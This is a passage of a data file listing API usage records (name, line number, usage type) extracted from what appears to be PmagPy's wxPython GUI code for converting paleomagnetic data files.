{"api_name": "dialogs.pmag_widgets", "line_number": 2141, "usage_type": "name"}, {"api_name": "pmagpy.convert_2_magic.pmd", "line_number": 2141, "usage_type": "attribute"}, {"api_name": "pmagpy.convert_2_magic", "line_number": 2141, "usage_type": "name"}, {"api_name": "wx.Frame", "line_number": 2144, "usage_type": "attribute"}, {"api_name": "wx.Frame.__init__", "line_number": 2150, "usage_type": "call"}, {"api_name": "wx.Frame", "line_number": 2150, "usage_type": "attribute"}, {"api_name": "wx.ID_ANY", "line_number": 2150, "usage_type": "attribute"}, {"api_name": "wx.ScrolledWindow", "line_number": 2151, "usage_type": "call"}, {"api_name": "wx.BoxSizer", "line_number": 2159, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 2159, "usage_type": "attribute"}, {"api_name": "wx.StaticText", "line_number": 2160, "usage_type": "call"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2160, "usage_type": "attribute"}, {"api_name": "dialogs.pmag_widgets.labeled_yes_or_no", "line_number": 2166, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2166, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.check_box", "line_number": 2169, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2169, "usage_type": "name"}, {"api_name": "wx.EVT_CHECKBOX", "line_number": 2170, "usage_type": "attribute"}, {"api_name": "dialogs.pmag_widgets.choose_file", "line_number": 2173, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2173, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.labeled_text_field", "line_number": 2177, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2177, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.labeled_text_field", "line_number": 2181, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2181, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.labeled_text_field", "line_number": 2186, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2186, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.sampling_particulars", "line_number": 2190, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2190, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.labeled_text_field", "line_number": 2193, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2193, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.specimen_n", "line_number": 2196, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2196, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.select_ncn", "line_number": 2200, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2200, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.labeled_text_field", "line_number": 2204, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2204, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.site_lat_lon", "line_number": 2207, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2207, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.replicate_measurements", "line_number": 2210, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2210, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.btn_panel", "line_number": 2213, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2213, "usage_type": "name"}, {"api_name": "wx.BoxSizer", "line_number": 2216, "usage_type": "call"}, {"api_name": "wx.VERTICAL", "line_number": 2216, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 2217, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 2217, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2218, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2218, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2221, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2221, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2222, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2222, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2223, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2223, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2224, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2224, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2225, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2225, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2226, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2226, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2227, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2227, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2228, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2228, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2229, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2229, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2230, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2230, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2231, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2231, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2232, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2232, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2233, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2233, "usage_type": "attribute"}, {"api_name": "wx.StaticLine", "line_number": 2235, "usage_type": "call"}, {"api_name": "wx.ALL", "line_number": 2235, "usage_type": "attribute"}, {"api_name": "wx.EXPAND", "line_number": 2235, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_CENTER", "line_number": 2236, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 2239, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 2239, "usage_type": "attribute"}, {"api_name": "dialogs.pmag_widgets.on_add_file_button", "line_number": 2275, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2275, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.on_add_file_button", "line_number": 2279, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2279, "usage_type": "name"}, {"api_name": "os.path.split", "line_number": 2292, "usage_type": "call"}, {"api_name": "os.path", "line_number": 2292, "usage_type": "attribute"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 2294, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2294, "usage_type": "name"}, {"api_name": "os.path.split", "line_number": 2297, "usage_type": "call"}, {"api_name": "os.path", "line_number": 2297, "usage_type": "attribute"}, {"api_name": "os.path.split", "line_number": 2299, "usage_type": "call"}, {"api_name": "os.path", "line_number": 2299, "usage_type": "attribute"}, {"api_name": "os.path.split", "line_number": 2301, "usage_type": "call"}, {"api_name": "os.path", "line_number": 2301, "usage_type": "attribute"}, {"api_name": "os.path.split", "line_number": 2303, "usage_type": "call"}, {"api_name": "os.path", "line_number": 2303, "usage_type": "attribute"}, {"api_name": "os.path.split", "line_number": 2305, "usage_type": "call"}, {"api_name": "os.path", "line_number": 2305, "usage_type": "attribute"}, {"api_name": "os.chdir", "line_number": 2334, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 2343, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2343, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 2349, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2349, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 2352, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2352, "usage_type": "name"}, {"api_name": "pmagpy.convert_2_magic.jr6_txt", "line_number": 2361, "usage_type": "call"}, {"api_name": "pmagpy.convert_2_magic", "line_number": 2361, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.close_window", "line_number": 2364, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2364, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 2366, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2366, "usage_type": "name"}, {"api_name": "pmagpy.convert_2_magic.jr6_jr6", "line_number": 2368, "usage_type": "call"}, {"api_name": "pmagpy.convert_2_magic", "line_number": 2368, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.close_window", "line_number": 2371, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2371, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 2373, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2373, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 2376, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2376, "usage_type": "name"}, {"api_name": "pmagpy.convert_2_magic.iodp_jr6", "line_number": 2377, "usage_type": "call"}, {"api_name": "pmagpy.convert_2_magic", "line_number": 2377, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.close_window", "line_number": 2380, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2380, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 2382, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2382, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.on_helpButton", "line_number": 2396, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2396, "usage_type": "name"}, {"api_name": "programs.conversion_scripts.jr6_txt_magic.do_help", "line_number": 2396, "usage_type": "call"}, {"api_name": "programs.conversion_scripts.jr6_txt_magic", "line_number": 2396, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.on_helpButton", "line_number": 2398, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2398, "usage_type": "name"}, {"api_name": "programs.conversion_scripts.jr6_jr6_magic.do_help", "line_number": 2398, "usage_type": "call"}, {"api_name": "programs.conversion_scripts.jr6_jr6_magic", "line_number": 2398, "usage_type": "name"}, {"api_name": "wx.Frame", "line_number": 2401, "usage_type": "attribute"}, {"api_name": "wx.Frame.__init__", "line_number": 2407, "usage_type": "call"}, {"api_name": "wx.Frame", "line_number": 2407, "usage_type": "attribute"}, {"api_name": "wx.ID_ANY", "line_number": 2407, "usage_type": "attribute"}, {"api_name": "wx.ScrolledWindow", "line_number": 2408, "usage_type": "call"}, {"api_name": "wx.BoxSizer", "line_number": 2417, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 2417, "usage_type": "attribute"}, {"api_name": "wx.StaticText", "line_number": 2418, "usage_type": "call"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2418, "usage_type": "attribute"}, {"api_name": "dialogs.pmag_widgets.choose_file", "line_number": 2421, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2421, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.labeled_text_field", "line_number": 2424, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2424, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.labeled_text_field", "line_number": 2427, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2427, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.labeled_text_field", "line_number": 2430, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2430, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.sampling_particulars", "line_number": 2434, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2434, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.replicate_measurements", "line_number": 2438, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2438, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.labeled_text_field", "line_number": 2442, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2442, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.select_ncn", "line_number": 2445, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2445, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.specimen_n", "line_number": 2449, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2449, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.btn_panel", "line_number": 2453, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2453, "usage_type": "name"}, {"api_name": "wx.BoxSizer", "line_number": 2457, "usage_type": "call"}, {"api_name": "wx.VERTICAL", "line_number": 2457, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2460, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2460, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2461, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2461, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2462, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2462, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2463, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2463, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2464, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2464, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2465, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2465, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2466, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2466, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2467, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2467, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2468, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2468, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2469, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2469, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_CENTER", "line_number": 2472, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 2475, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 2475, "usage_type": "attribute"}, {"api_name": "dialogs.pmag_widgets.on_add_file_button", "line_number": 2489, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2489, "usage_type": "name"}, {"api_name": "os.chdir", "line_number": 2492, "usage_type": "call"}, {"api_name": "os.path.split", "line_number": 2497, "usage_type": "call"}, {"api_name": "os.path", "line_number": 2497, "usage_type": "attribute"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 2538, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2538, "usage_type": "name"}, {"api_name": "os.listdir", "line_number": 2547, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 2547, "usage_type": "call"}, {"api_name": "os.path", "line_number": 2547, "usage_type": "attribute"}, {"api_name": "pmagpy.convert_2_magic.bgc", "line_number": 2562, "usage_type": "call"}, {"api_name": "pmagpy.convert_2_magic", "line_number": 2562, "usage_type": "name"}, {"api_name": "pmagpy.convert_2_magic.bgc", "line_number": 2569, "usage_type": "call"}, {"api_name": "pmagpy.convert_2_magic", "line_number": 2569, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.close_window", "line_number": 2572, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2572, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 2574, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2574, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.on_helpButton", "line_number": 2581, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2581, "usage_type": "name"}, {"api_name": "pmagpy.convert_2_magic.bgc", "line_number": 2581, "usage_type": "attribute"}, {"api_name": "pmagpy.convert_2_magic", "line_number": 2581, "usage_type": "name"}, {"api_name": "wx.BoxSizer", "line_number": 2599, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 2599, "usage_type": "attribute"}, {"api_name": "wx.StaticText", "line_number": 2600, "usage_type": "call"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2600, "usage_type": "attribute"}, {"api_name": "dialogs.pmag_widgets.choose_file", "line_number": 2603, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2603, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.sampling_particulars", "line_number": 2606, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2606, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.select_ncn", "line_number": 2609, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2609, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.specimen_n", "line_number": 2613, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2613, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.labeled_text_field", "line_number": 2617, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2617, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.replicate_measurements", "line_number": 2620, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2620, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.lab_field", "line_number": 2623, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2623, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.check_box", "line_number": 2627, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2627, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.site_lat_lon", "line_number": 2630, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2630, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.btn_panel", "line_number": 2634, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2634, "usage_type": "name"}, {"api_name": "wx.BoxSizer", "line_number": 2637, "usage_type": "call"}, {"api_name": "wx.VERTICAL", "line_number": 2637, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2640, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2640, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2641, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2641, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2642, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2642, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2643, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2643, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2644, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2644, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2645, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2645, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2646, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2646, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2647, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2647, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2648, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2648, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2649, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2649, "usage_type": "attribute"}, {"api_name": "wx.StaticLine", "line_number": 2651, "usage_type": "call"}, {"api_name": "wx.ALL", "line_number": 2651, "usage_type": "attribute"}, {"api_name": "wx.EXPAND", "line_number": 2651, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_CENTER", "line_number": 2652, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 2655, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 2655, "usage_type": "attribute"}, {"api_name": "os.chdir", "line_number": 2671, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 2677, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2677, "usage_type": "name"}, {"api_name": "os.path.split", "line_number": 2679, "usage_type": "call"}, {"api_name": "os.path", "line_number": 2679, "usage_type": "attribute"}, {"api_name": "pmagpy.convert_2_magic.utrecht", "line_number": 2736, "usage_type": "call"}, {"api_name": "pmagpy.convert_2_magic", "line_number": 2736, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.close_window", "line_number": 2738, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2738, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 2740, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2740, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.on_helpButton", "line_number": 2746, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2746, "usage_type": "name"}, {"api_name": "pmagpy.convert_2_magic.utrecht", "line_number": 2746, "usage_type": "attribute"}, {"api_name": "pmagpy.convert_2_magic", "line_number": 2746, "usage_type": "name"}, {"api_name": "wx.Frame", "line_number": 2750, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 2758, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 2758, "usage_type": "attribute"}, {"api_name": "wx.StaticText", "line_number": 2759, "usage_type": "call"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2759, "usage_type": "attribute"}, {"api_name": "dialogs.pmag_widgets.choose_file", "line_number": 2762, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2762, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.btn_panel", "line_number": 2780, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2780, "usage_type": "name"}, {"api_name": "wx.BoxSizer", "line_number": 2784, "usage_type": "call"}, {"api_name": "wx.VERTICAL", "line_number": 2784, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2787, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2787, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2788, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2788, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_CENTER", "line_number": 2798, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 2801, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 2801, "usage_type": "attribute"}, {"api_name": "dialogs.pmag_widgets.on_add_file_button", "line_number": 2814, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2814, "usage_type": "name"}, {"api_name": "os.chdir", "line_number": 2817, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets.run_command_and_close_window", "line_number": 2819, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2819, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.on_helpButton", "line_number": 2822, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2822, "usage_type": "name"}, {"api_name": "wx.Frame", "line_number": 2832, "usage_type": "attribute"}, {"api_name": "wx.Frame.__init__", "line_number": 2834, "usage_type": "call"}, {"api_name": "wx.Frame", "line_number": 2834, "usage_type": "attribute"}, {"api_name": "sys.platform", "line_number": 2841, "usage_type": "attribute"}, {"api_name": "wx.ScrolledWindow", "line_number": 2842, "usage_type": "call"}, {"api_name": "wx.SIMPLE_BORDER", "line_number": 2842, "usage_type": "attribute"}, {"api_name": "wx.ALWAYS_SHOW_SB", "line_number": 2842, "usage_type": "attribute"}, {"api_name": "wx.Panel", "line_number": 2844, "usage_type": "call"}, {"api_name": "wx.SIMPLE_BORDER", "line_number": 2844, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 2859, "usage_type": "call"}, {"api_name": "os.path", "line_number": 2859, "usage_type": "attribute"}, {"api_name": "pmagpy.pmag.magic_read_dict", "line_number": 2860, "usage_type": "call"}, {"api_name": "pmagpy.pmag", "line_number": 2860, "usage_type": "name"}, {"api_name": "wx.EVT_MENU", "line_number": 2867, "usage_type": "attribute"}, {"api_name": "pmagpy.mapping.map_magic.mapping", "line_number": 2913, "usage_type": "call"}, {"api_name": "pmagpy.mapping.map_magic", "line_number": 2913, "usage_type": "name"}, {"api_name": "pmagpy.mapping.map_magic.magic3_2_orient_magic_map", "line_number": 2913, "usage_type": "attribute"}, {"api_name": "wx.StaticBoxSizer", "line_number": 2925, "usage_type": "call"}, {"api_name": "wx.StaticBox", "line_number": 2925, "usage_type": "call"}, {"api_name": "wx.ID_ANY", "line_number": 2925, "usage_type": "attribute"}, {"api_name": "wx.VERTICAL", "line_number": 2925, "usage_type": "attribute"}, {"api_name": "wx.StaticText", "line_number": 2927, "usage_type": "call"}, {"api_name": "wx.BoxSizer", "line_number": 2928, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 2928, "usage_type": "attribute"}, {"api_name": "wx.Button", "line_number": 2929, "usage_type": "call"}, {"api_name": "wx.ID_ANY", "line_number": 2929, "usage_type": "attribute"}, {"api_name": "wx.EVT_BUTTON", "line_number": 2930, "usage_type": "attribute"}, {"api_name": "wx.Button", "line_number": 2931, "usage_type": "call"}, {"api_name": "wx.ID_ANY", "line_number": 2931, "usage_type": "attribute"}, {"api_name": "wx.EVT_BUTTON", "line_number": 2932, "usage_type": "attribute"}, {"api_name": "wx.Button", "line_number": 2933, "usage_type": "call"}, {"api_name": "wx.ID_ANY", "line_number": 2933, "usage_type": "attribute"}, {"api_name": "wx.EVT_BUTTON", "line_number": 2934, "usage_type": "attribute"}, {"api_name": "wx.LEFT", "line_number": 2936, "usage_type": "attribute"}, {"api_name": "wx.LEFT", "line_number": 2937, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 2939, "usage_type": "call"}, {"api_name": "wx.VERTICAL", "line_number": 2939, "usage_type": "attribute"}, {"api_name": "wx.CENTRE", "line_number": 2941, "usage_type": "attribute"}, {"api_name": "wx.CENTRE", "line_number": 2942, "usage_type": "attribute"}, {"api_name": "wx.ALL", "line_number": 2942, "usage_type": "attribute"}, {"api_name": "wx.CENTRE", "line_number": 2944, "usage_type": "attribute"}, {"api_name": "wx.ALL", "line_number": 2945, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 2946, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 2946, "usage_type": "attribute"}, {"api_name": "sys.platform", "line_number": 2948, "usage_type": "attribute"}, {"api_name": "wx.EVT_CLOSE", "line_number": 2953, "usage_type": "attribute"}, {"api_name": "dialogs.magic_grid2.MagicGrid", "line_number": 2983, "usage_type": "call"}, {"api_name": "dialogs.magic_grid2", "line_number": 2983, "usage_type": "name"}, {"api_name": "dialogs.drop_down_menus3.Menus", "line_number": 3042, "usage_type": "call"}, {"api_name": "dialogs.drop_down_menus3", "line_number": 3042, "usage_type": "name"}, {"api_name": "wx.grid", "line_number": 3043, "usage_type": "attribute"}, {"api_name": "wx.ALL", "line_number": 3048, "usage_type": "attribute"}, {"api_name": "wx.FileDialog", "line_number": 3076, "usage_type": "call"}, {"api_name": "wx.FD_OPEN", "line_number": 3080, "usage_type": "attribute"}, {"api_name": "wx.FD_CHANGE_DIR", "line_number": 3080, "usage_type": "attribute"}, {"api_name": "wx.ID_OK", "line_number": 3082, "usage_type": "attribute"}, {"api_name": "pmagpy.pmag.magic_read_dict", "line_number": 3085, "usage_type": "call"}, {"api_name": "pmagpy.pmag", "line_number": 3085, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 3102, "usage_type": "call"}, {"api_name": "os.path", "line_number": 3102, "usage_type": "attribute"}, {"api_name": "wx.MessageDialog", "line_number": 3118, "usage_type": "call"}, {"api_name": "wx.OK", "line_number": 3118, "usage_type": "attribute"}, {"api_name": "wx.ICON_INFORMATION", "line_number": 3118, "usage_type": "attribute"}, {"api_name": "wx.ID_OK", "line_number": 3133, "usage_type": "attribute"}, {"api_name": "wx.ID_OK", "line_number": 3154, "usage_type": "attribute"}, {"api_name": "os.chdir", "line_number": 3179, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 3180, "usage_type": "call"}, {"api_name": "os.path", "line_number": 3180, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 3180, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 3182, "usage_type": "call"}, {"api_name": "os.path", "line_number": 3182, "usage_type": "attribute"}, {"api_name": 